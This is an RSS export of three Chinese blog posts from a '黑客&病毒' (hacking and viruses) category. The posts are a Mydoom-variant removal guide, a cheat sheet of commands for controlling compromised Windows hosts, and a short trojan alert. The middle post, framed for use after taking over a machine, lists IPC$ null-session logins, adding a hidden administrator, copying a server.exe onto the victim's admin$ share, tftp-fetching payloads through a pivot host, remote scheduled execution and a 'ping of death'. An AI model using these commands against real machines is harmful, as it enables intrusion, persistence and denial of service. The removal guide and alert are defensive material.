1.SYSTEM.INI (NT系统在注册表: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon)

shell = Explorer.exe 1 修改为shell = Explorer.exe

2.将 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下的

Torjan Program----------C:\WINNT\services.exe删除

3. HKEY_Classes_root\.exe

默认值 winfiles 改为exefile

4.删除以下两个键值:

HKEY_Classes_root\winfiles

HKEY_Local_machine\software\classes\winfiles

5. 打开注册表编辑器,依此分别查找“rundll32.com”、“finder.com”、“command.pif”,把找到的内容里面的“rundll32.com”、“finder.com”、“command.pif”分别改为“Rundll32.exe”

6. 查找“iexplore.com”的信息,把找到的内容里面的“iexplore.com”改为“iexplore.exe”

7. 查找“explorer.com”的信息,把找到的内容里面的“explorer.com”改为“explorer.exe”

8. 查找“iexplore.pif”,应该能找到类似“%ProgramFiles%\Common Files\iexplore.pif”的信息,把这内容改为“C:\Program Files\Internet Explorer\iexplore.exe”

9. 删除病毒添加的文件关联信息和启动项:

[HKEY_CLASSES_ROOT\winfiles]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"Torjan Program"="%Windows%\services.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]

"Torjan Program"="%Windows%\services.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]

"Shell"="Explorer.exe 1"

改为

"Shell"="Explorer.exe"

10. 这些是病毒释放的一个VB库文件(MSWINSCK.OCX)的相关信息,不一定要删除:

HKEY_CLASSES_ROOT\MSWinsock.Winsock

HKEY_CLASSES_ROOT\MSWinsock.Winsock.1

HKEY_CLASSES_ROOT\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}

HKEY_CLASSES_ROOT\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}

HKEY_CLASSES_ROOT\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}

HKEY_CLASSES_ROOT\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}

HKEY_CLASSES_ROOT\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}

注:因为病毒修改了很多关联信息,所以在那些病毒文件没有被删除之前,请不要做任何多余的操作,以免激活病毒

二、然后重启系统,删除以下文件部分,注意打开各分区时,先打开“我的电脑”后请使用右键单击分区,选“打开”进入。或者直接执行附件的Kv.bat来删除以下文件

c:\antorun.inf (如果你有多个分区,请检查其他分区是否有这个文件,有也一并删除)

%programfiles%\common files\iexplore.pif

%programfiles%\Internat explorer\iexplore.com

%windir%\1.com

%windir%\exeroute.exe

%windir%\explorer.com

%windir%\finder.com

%windir%\mswinsck.ocx

%windir%\services.exe

%windir%\system32\command.pif

%windir%\system32\dxdiag.com

%windir%\system32\finder.com

%windir%\system32\msconfig.com

%windir%\system32\regedit.com

%windir%\system32\rundll32.com

删除以下文件夹:

%windir%\debug

%windir%\system32\NtmsData

一、病毒评估

1. 病毒中文名: SCO炸弹变种N

2. 病毒英文名: Worm.Novarg.N

3. 病毒别名: Worm.Mydoom.m

4. 病毒大小: 28832字节

5. 病毒类型: 蠕虫病毒

6. 病毒危险等级: ★★★★

7. 病毒传播途径: 邮件

8. 病毒依赖系统: Windows 9X/NT/2000/XP

二、病毒的破坏

1. 通过电子邮件传播的蠕虫病毒,感染之后,它会先在用户本地机器上搜索电子邮件地址,向其发送病毒邮件;

2. 利用在本机上搜索到的邮件地址的后缀当关键词,在Google、Yahoo等四个搜索引擎上搜索相关的email地址,发送病毒邮件传播自身。

3. 大量发送的搜索请求使这四个搜索引擎的运行速度明显变慢。

4. 感染了此病毒的机器,IE浏览器、OE软件和Outlook软件都不能正常使用。

5. 病毒大量向外发送病毒邮件,严重消耗网络资源,可能造成局域网堵塞。

三、技术分析

1. 蠕虫病毒,采用Upx压缩。运行后,将自己复制到%WINDOWS%目录下,文件名为:java.exe。释放一个后门病毒在同一目录中,文件名为:services.exe。

2. 在注册表启动项“\CurrentVersion\Run”下加入这两个文件的启动键值:JavaVM和Service,实现病毒的开机自启动。

3. 强行关闭IE浏览器、OE软件和Outlook软件,使其不能正常使用。

4. 在本地机器上搜索电子邮件地址:从注册表中读取当前系统当前使用的wab文件名,并在其中搜索email地址;搜索internet临时目录 (Local Settings\Temporary Internet Files)中的文件,从中提取电子邮件地址;遍历盘符从C:盘到Z:的所有硬盘,并尝试从以下扩展名文件中提取email地址:.adb ,.asp ,.dbx ,.htm ,.php ,.pl ,.sht ,.tbb ,.txt ,.wab。

5. 当病毒搜索到email地址以后,病毒以“mailto+%本地系统搜出的邮件地址%”、“reply+%本地系统搜出的邮件地址%”、 “{|contact+| |e| |-| |mail}+%本地系统搜出的邮件地址%”为关键字,利用以下四种搜索引擎进行email地址邮件搜索:search.lycos.com、 search.yahoo.com、、,利用这种手段,病毒能够搜索到非常多的可用邮件 地址。

6. 病毒邮件的附件名称为:readme ,instruction ,transcript ,mail ,letter ,file ,text ,attachment等,病毒附件扩展名为:cmd ,bat ,com ,exe ,pif ,scr ,zip。

四、病毒解决方案:

1. 进行升级

瑞星公司将于当天进行紧急升级,升级后的软件版本号为16.37.10,该版本的瑞星杀毒软件可以彻底查杀“SCO炸弹变种N”病毒,瑞星杀毒软件标准版和网络版的用户可以直接登陆瑞星网站( )下载升级包进行升级,或者使用瑞星杀毒软件的智能升级功能。

2. 使用专杀工具

鉴于该病毒的特性,瑞星公司还为手中暂时没有杀毒软件的用户提供了免费的病毒专杀工具,用户可以到: 网址免费下载使用。

3. 使用在线杀毒和下载版

用户还可以使用瑞星公司的在线杀毒与下载版产品清除该病毒,这两款产品是通过手机付费使用的,用户可以登陆 使用在线杀毒产品,或者登陆 使用下载版产品。

4. 打电话求救

如果遇到关于该病毒的其它问题,用户可以随时拨打瑞星反病毒急救电话:010-82678800来寻求反病毒专家的帮助!

5. 手动清除

(1)结束系统中进程名为:Services.exe和java.exe(在%windows%目录中)

(2)删除系统临时目录中的两个病毒数据文件:MLITGB.LOG和ZINCITE.LOG

(3)删除病毒键立的注册表键:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

“JavaVM”=%WINDOWS%\java.exe

和HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

“Services”=%WINDOWS%\Services.exe

注: %WINDOWS% 是指系统的windows目录,在Windows 9X/ME/XP下默认为:

C:\WINDOWS,Win2K下默认为:C:\WINNT

注: %WINDIR%指的是Windows系统的安装目录,在Windows 95/98/ME/XP操作系统下默认为:C:\WINDOWS目录,在WINDOWS2000操作系统下默认为:C:\WINNT目录。

五、安全建议:

1. 建立良好的安全习惯。 例如:对一些来历不明的邮件及附件不要打开,不要上一些不太了解的网站、不要执行从 Internet 下载后未经杀毒处理的软件等,这些必要的习惯会使您的计算机更安全。

2. 关闭或删除系统中不需要的服务。 默认情况下,许多操作系统会安装一些辅助服务,如 FTP 客户端、Telnet 和 Web 服务器。这些服务为攻击者提供了方便,而又对用户没有太大用处,如果删除它们,就能大大减少被攻击的可能性。

3. 经常升级安全补丁。 据统计,有80%的网络病毒是通过系统安全漏洞进行传播的,象蠕虫王、冲击波、震荡波等,所以我们应该定期到微软网站去下载最新的安全补丁,以防范未然。

4. 使用复杂的密码。 有许多网络病毒就是通过猜测简单密码的方式攻击系统的,因此使用复杂的密码,将会大大提高计算机的安全系数。

5. 迅速隔离受感染的计算机。 当您的计算机发现病毒或异常时应立刻断网,以防止计算机受到更多的感染,或者成为传播源,再次感染其它计算机。

6. 了解一些病毒知识。 这样就可以及时发现新病毒并采取相应措施,在关键时刻使自己的计算机免受病毒破坏。如果能了解一些注册表知识,就可以定期看一看注册表的自启动项是否有可疑键值;如果了解一些内存知识,就可以经常看看内存中是否有可疑程序。

7. 最好安装专业的杀毒软件进行全面监控。 在病毒日益增多的今天,使用杀毒软件进行防毒,是越来越经济的选择,不过用户在安装了反病毒软件之后,应该经常进行升级、将一些主要监控经常打开(如邮件监控)、内存监控等、遇到问题要上报, 这样才能真正保障计算机的安全。

8. 用户还应该安装个人防火墙软件进行防黑。 由于网络的发展,用户电脑面临的黑客攻击问题也越来越严重,许多网络病毒都采用了黑客的方法来攻击用户电脑,因此,用户还应该安装个人防火墙软件,将安全级别设为中、高,这样才能有效地防止网络上的黑客攻击。

]]>
黑客&amp;病毒http://www.zyseo.org/post/services.exe.html#commenthttp://www.zyseo.org/http://www.zyseo.org/feed.asp?cmt=207http://www.zyseo.org/cmd.asp?act=tb&id=207&key=db5c0c2a
3389得肉鸡后命令全集null@null.com (zyseo)http://www.zyseo.org/post/3389.htmlMon, 05 May 2008 10:44:11 +0800http://www.zyseo.org/post/3389.htmlnet use $">\\ip\ipc$Content$nbsp;" " /user:" " 建立IPC空链接
net use $">\\ip\ipc$Content$nbsp;"密码" /user:"用户名" 建立IPC非空链接
net use h: $">\\ip\c$Content$nbsp;"密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:
net use h: $">\\ip\c$Content$nbsp;登陆后映射对方C:到本地为H:
net use $">\\ip\ipc$Content$nbsp;/del 删除IPC链接
net use h: /del 删除映射对方到本地的为H:的映射
net user 用户名 密码 /add 建立用户
net user guest /active:yes 激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数
net start 查看开启了哪些服务
net start 服务名 开启服务;(如:net start telnet, net start schedule)
net stop 服务名 停止某服务
net time \\目标ip 查看对方时间
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view \\ip 查看对方局域网内开启了哪些共享
net config 显示系统网络设置
net logoff 断开连接的共享
net pause 服务名 暂停某服务
net send ip "文本信息" 向对方发信息
net ver 局域网内正在使用的网络连接类型和信息
net share 查看本地开启的共享
net share ipc$Content$nbsp;开启ipc$共享
net share ipc$Content$nbsp;/del 删除ipc$共享
net share c$Content$nbsp;/del 删除C:共享
net user guest 12345 用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的网络连接情况,常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令
at id号 开启已注册的某个计划任务
at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止
at id号 /delete 停止某个已注册的计划任务
at 查看所有的计划任务
at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆服务器,默认端口为23
open ip 连接到IP(属telnet登陆后的命令)
telnet 在本机上直接键入telnet 将进入本机的telnet
copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件
copy c:\srv.exe $">\\ip\admin$Content$nbsp;复制本地c:\srv.exe到对方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
copy $\svv.exe">\\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:
xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)
route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令
mem 查看cpu使用情况
attrib 文件名(目录名) 查看某文件(目录)的属性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性
dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间

set 指定环境变量名称=要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
pause 暂停批处理程序,并显示出:请按任意键继续....
if 在批处理程序中执行条件处理(更多说明见if命令及变量)
goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)
for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)
echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置
echo 信息 在屏幕上显示出信息
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
find 文件名 查找某文件
title 标题名字 更改CMD窗口标题名字
color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ )
print 文件名 打印文本文件
ver 在DOS窗口下显示版本信息
winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
md 目录名 创建目录
replace 源文件 要替换文件的目录 替换文件
ren 原文件名 新文件名 重命名文件名
tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称
type 文件名 显示文本文件的内容
more 文件名 逐屏显示输出文件
doskey 要锁定的命令=字符
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir=
taskmgr 调出任务管理器
chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误
tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口
exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe
path 路径\可执行文件的文件名 为可执行文件设置一个路径。
cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /?
regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示;
regedit /e 注册表文件名 导出注册表
cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
cacls 文件名 查看文件的访问用户权限列表
REM 文本内容 在批处理文件中添加注解
netsh 查看或更改本地网络配置情况
IIS服务命令:
iisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现)
iisreset /start或stop 启动(停止)所有Internet服务
iisreset /restart 停止然后重新启动所有Internet服务
iisreset /status 显示所有Internet服务状态
iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机
iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务
iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。
FTP 命令: (后面有详细说明内容)
ftp的命令行格式为:
ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。
-d 使用调试方式。
-n 限制ftp的自动登录,即不使用.netrc文件。
-g 取消全局文件名。
help [命令] 或 ?[命令] 查看命令说明
bye 或 quit 终止主机FTP进程,并退出FTP管理方式.
pwd 列出当前远端主机目录
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
mget [remote-files] 从远端主机接收一批文件至本地主机
mput local-files 将本地主机中一批文件传送至远端主机
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
ascii 设定以ASCII方式传送文件(缺省值)
bin 或 image 设定以二进制方式传送文件
bell 每完成一次文件传送,报警提示
cdup 返回上一级目录
close 中断与远程服务器的ftp会话(与open对应)
open host[port] 建立指定ftp服务器连接,可指定连接端口
delete 删除远端主机中的文件
mdelete [remote-files] 删除一批文件
mkdir directory-name 在远端主机中建立目录
rename [from] [to] 改变远端主机中的文件名
rmdir directory-name 删除远端主机中的目录
status 显示当前FTP的状态
system 显示远端主机系统类型
user user-name [password] [account] 重新以别的用户名登录远端主机
open host [port] 重新建立一个新的连接
prompt 交互提示模式
macdef 定义宏命令
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
chmod 改变远端主机的文件权限
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
cd remote-dir 进入远程主机目录
cdup 进入远程主机目录的父目录
! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip
MYSQL 命令:
mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。
(例:mysql -h110.110.110.110 -Uroot -P123456
注:u与root可以不用加空格,其它也一样)
exit 退出MYSQL
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符)
show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作.

]]>
黑客&amp;病毒http://www.zyseo.org/post/3389.html#commenthttp://www.zyseo.org/http://www.zyseo.org/feed.asp?cmt=201http://www.zyseo.org/cmd.asp?act=tb&id=201&key=0965af89
本周病毒红色警告null@null.com (zyseo)http://www.zyseo.org/post/bingdujinggao.htmlMon, 10 Mar 2008 10:36:00 +0800http://www.zyseo.org/post/bingdujinggao.html
病毒,警惕程度为★★★

“线上游戏窃取者变种LUF”病毒是用VC语言编写的木马病毒。病毒运行后会首先将系统的扬声器设置成静音,避免杀毒软件和安全工具发出警告声响,并试图关闭多种主流杀毒软件和安全工具。然后病毒将自身复制到系统目录下,修改注册表启动项实现开机自启动。同时,病毒还会加载到所有进程中,在后台监视和窃取用户网游账号、密码等信息,并发送到黑客指定网站,使玩家蒙受损失。

对此,专家建议用户:
1.养成良好的上网习惯,不打开不良网站,不随意下载安装可以插件。
2.开启Windows自动更新,及时安装最新系统补丁,避免病毒通过系统漏洞入侵电脑。
3.安装杀毒软件并升级到最新版本,定时杀毒并开启实时监控功能,防止病毒感染计算机。
4.把网银、网游、QQ等重要软件加入到“账号保险柜”中,防止被病毒窃取。 ]]>
黑客&amp;病毒http://www.zyseo.org/post/bingdujinggao.html#commenthttp://www.zyseo.org/http://www.zyseo.org/feed.asp?cmt=170http://www.zyseo.org/cmd.asp?act=tb&id=170&key=98f2b026